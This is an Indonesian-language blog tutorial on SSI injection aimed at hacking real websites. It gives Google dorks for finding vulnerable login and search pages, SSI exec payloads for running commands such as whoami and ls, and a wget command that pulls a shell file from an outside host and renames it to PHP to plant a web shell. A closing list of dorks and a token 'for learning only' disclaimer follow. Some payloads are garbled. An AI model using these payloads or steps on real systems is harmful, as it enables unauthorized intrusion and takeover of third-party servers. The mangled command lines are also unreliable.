SSI Injection Tutorial Upload Shell

Ok kali ini saya akan sedikit berbagi tentang pengalaman saya yaitu SSI Injection :D bahasa yang aneh ya, Pertama situs yang paling mudah di hacked itu memakai SSI Injection (saya akan memberikan beberapa dorks dan situs rentan sedikit untuk berlatih di Situs)..

Kedua Gunakanlah akal sehat mu, lol ..kalo masih newbie kalian pasti bertanya apa itu SSI ? kalo buat para master mohon maaf mungkin ini adalah tidak penting :D ok lanjut SSI Injection (Server-side Include) yaitu server-side memanfaatkan teknik yang memungkinkan penyerang untuk mengirim kode ke aplikasi web, yang kemudian akan dieksekusi secara lokal oleh server web. SSI Injection memanfaatkan kegagalan aplikasi Web untuk membersihkan yang disediakan pengguna data sebelum mereka dimasukkan ke dalam sisi server-ditafsirkan file HTML. WOW

Server-Side Includes serangan memungkinkan eksploitasi aplikasi web dengan menyuntikkan Script di halaman HTML atau mengeksekusi kode jarak jauh. Hal ini dapat dimanfaatkan melalui manipulasi SSI digunakan dalam aplikasi atau memaksa penggunaannya melalui bidang input pengguna hahahaha.....

Jika penyerang mengajukan Server-side kalian harus Sertakan pernyataan, ia mungkin memiliki kemampuan untuk menjalankan perintah sistem operasi sewenang-wenang, atau menyertakan isi file terbatas ini waktu berikutnya halaman disajikan.

Keterangan Diambil Dari: http://nightcode.weebly.com/ssi-injection.html

Bab I - Mencari situs rentan
Saya akan memberikan beberapa Dorks untuk tipe injeksi.
Dork terbaik saya temukan adalah inurl:bin/Cklb/ tapi memberikan sekitar 863 hasil sehingga tidak dapat digunakan.

Mari kita mulai bekerja Dari Sini hahahaaaa....

Masukkan inurl:bin/Cklb/ di Google dan pergi ketempat pengujian, atau pergi ke situs korban..

Bab II - Pengujian situs
Jadi, ketika Anda menggunakan dork itu dan Anda membuka satu situs sekarang Anda harus menentukan id situs ini rentan terhadap jenis injeksi, yaitu untuk seorang newbie carilah website yang mudah dulu, woKee..
Berikut adalah beberapa perintah yang dapat Anda gunakan :


<!--#echo var="DATE_LOCAL" -->
Akan menampilkan Tanggal perintah tersebut


<- # Exec cmd = "whoami" -!>
Akan menunjukkan pengguna yang berjalan pada server

<pre> <- # exec cmd = "ls-a" -!> </ pre> <-! # exec cmd = "ls-a" -> </ pre> (Linux)
Akan menampilkan semua file dalam direktori

<-! # Exec cmd = "dir" -> (Windows)
Akan menampilkan semua file dalam direktori

Catatan: Anda akan perlu menggunakan <pre> </ pre> tag untuk memiliki beberapa perintah dieksekusi.

Sekarang mengambil salah satu perintah dan masukkan dalam kotak pencarian atau bidang login.
Sebagian masuk bidang rentan tapi ada beberapa kasus ketika kotak pencarian yang rentan.

CATATAN: (!! Jika login rentan) Anda yang paling Anda memasukkan perintah ke dalam kedua bidang

Aku punya situs saya misalnya:


Dan masukan perintah ini yang Digunakan:


Kode:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>



Sekarang kita melihat bahwa perintah kita berhasil dieksekusi dan bahwa situs dia rentan terhadap security dan mudah untuk di hacked :D  ....
 
Bab III - Spawning a shell

Jadi kita memiliki situs rentan dan kita siap untuk meng-upload shell.
Pertama-tama Anda akan memerlukan TXT dari shell favorit Anda. (Tuan Rumah itu Hosting tempat gratis, situs hack atau apapun yang Anda punya)

Sekarang kita harus men-download ke situs seperti ini:
Kode:
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

Jadi memasukkan situs Anda di mana shell Anda-host dalam perintah dan Anda siap untuk pergi.

Sekarang hanya tempel ke ladang dan tekan Enter atau Masuk.


Untuk melihat apakah Anda download file TXT mengeksekusi perintah yang kita gunakan sebelumnya.:
Kode:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


Jika Anda melihat bahwa itu berhasil diunduh sekarang Anda harus mengubah nama itu dari txt ke.. Php!
Anda dapat menggunakan perintah ini
Kode:
<!--#exec cmd="mv shell.txt shell.php" -->

Anda mengubah nama nama file apa yang pernah Anda butuhkan (Offcourse Anda akan perlu untuk menempatkan nama Anda. TXT pertama.)

Saya akan menggunakan script ini :
Kode:
<!--#exec cmd="mv config1.txt config.php" -->

Sekarang kita lihat daftar file dan mencoba untuk menemukan file Anda sekarang.
Jika Anda lakukan sekarang hanya mengaksesnya.




Itu akan menjadi akhir dari tutorial ini.
Saya harap Anda belajar sesuatu dan tidak memperkosa dengan situs tutorial ini ? kalian pasti ngerti
(Jadilah cerdas cara menggunakannya)


inurl: bin / Cklb / - Dork Terbaik
inurl: login.shtml
inurl: login.shtm
inurl: login.stm
inurl: search.shtml
inurl: search.shtm
inurl: search.stm
inurl: forgot.shtml
inurl: forgot.shtm
inurl: forgot.stm
inurl: register.shtml
inurl: register.shtm
inurl: register.stm
inurl: login.shtml page =?

Selamat mencoba, ingat ini hanya untuk pembelajar bukan untuk berfantasi ria hahahaahahah.... salemat pagi Cyber.. 
Previous
Next Post »
0 Komentar

Terimakasih telah berkomentar